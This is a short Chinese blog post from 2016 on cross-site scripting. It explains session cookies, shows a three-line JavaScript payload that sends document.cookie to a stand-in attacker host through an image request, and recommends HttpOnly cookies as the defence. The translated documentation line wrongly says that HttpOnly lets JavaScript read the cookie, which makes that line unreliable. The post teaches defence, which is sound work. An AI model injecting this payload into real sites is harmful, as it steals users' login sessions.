web开发安全之xss - cookie窃取
作者:巩文   发布时间:2016年03月14日  热度:3191℃   评论: 我要评论
做为web开发者,我们知道;当我们登录一个网页系统的时候,服务器会写一些cookie到我们的浏览器里(php默认的是 PHPSESSID );来记录用户登录状态。

当下次再访问其它页面的时候,浏览器会自动传递此cookie。

服务器通过这个传递过来对应的cookie来判定用户身份,从而返回与此用户相关数据的页面。

然而,浏览器客户端脚本语言javascript是可以通过 document.cookie 来得到cookie的。

那么如果所在的系统,存在xss漏洞。被值入如下js代码段
var img = document.createElement('img');
img.src = 'http://ooxx.com?c=' + encodeURIComponent(document.cookie);
document.getElementsByTagName('body')[0].appendChild(img);

这样就会,你把用户的cookie窃取。以img标 src的请求方式,发送到操蛋者(http://ooxx.com)的服务器中记录下来(记录的方式,有很多种。其中最简单的。nginx 的access.log日志若开启了,便会记录下来)。
黑客,拿到你的cookie登录凭证,就可以用你的身份。搞破坏了。。。

那么为了应对防止web开发,防不胜防的xss漏洞;而导致登录凭证被窃取。

伟大的人类发觉了此问题的严重性,为了杜绝cookie登录凭证被获取。

于是想到了,那出的问题,从那着手。
不是就是由于js能够通过document.cookie来获取浏览器cookie吗?
那么我们就给cookie定下个标识。定了个协义,如果有此标识的cookie的,不允许js获取。这个标识就是我们常见的httponly

以php语言为例,设置cookie的httponly语法如下.


其中有一段说明,翻译过来是

当httponly设置为ture。那么cookie会被javascript获取。这表明这种设置可以有效的减少xss攻击而造成的身份盗窃(并不是所有的浏览器都支持)。

可喜的是现在不支持httponly的浏览器,要绝种了。

评论 ( 0条 )
昵称: 必填     邮箱: 选填,承诺不会泄漏您的邮箱!
小兔表情
QQ表情
评论